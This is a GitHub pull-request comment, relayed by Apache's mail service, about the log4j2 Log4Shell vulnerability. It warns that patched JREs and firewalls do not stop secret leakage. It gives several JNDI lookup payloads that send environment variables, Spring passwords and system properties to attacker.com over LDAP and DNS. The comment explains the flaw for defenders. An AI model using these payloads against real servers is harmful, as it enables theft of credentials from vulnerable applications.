ahahu commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-991354707
I'd also like to stress that it is not sufficient to mitigate this
vulnerability by using a JRE/JDK version which prevents the RCE, nor should you
rely solely on your firewalls dropping outgoing TCP traffic.
The reason is that the vulnerability also has the potential for leaking
sensitive information via the LDAP request or via DNS.
Variable substitution in the payload can be nested, and one can use the "sys",
"env" or "bundle" keywords to access sensitive data, which is then used either
in the LDAP URL path or in the hostname.
Example for exfiltrating an environment variable containing a password, used
in the URL path:
`${jndi:ldap://www.attacker.com:1389/${env:MYSQL_PASSWORD}}`
This could be resolved to ldap://www.attacker.com:1389/mysecretpassword for
example.
Example for exfiltrating an environment variable containing a password in
the hostname part:
`${jndi:ldap://${env:MYSQL_PASSWORD}.attacker.com:1389/a}`
This could be resolved to ldap://mysecretpassword.attacker.com:1389/a for
example.
Of course this will fail if certain special characters are used in the
password.
Example for exfiltrating the property "spring.datasource.password" from the
application.properties file of a spring boot application:
`${jndi:ldap://${bundle:application:spring.datasource.password}.attacker.com:1389/a}`
Example for exfiltrating a system property that was passed on the command
line:
`${jndi:ldap://${sys:db.password}.attacker.com:1389/a}`
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.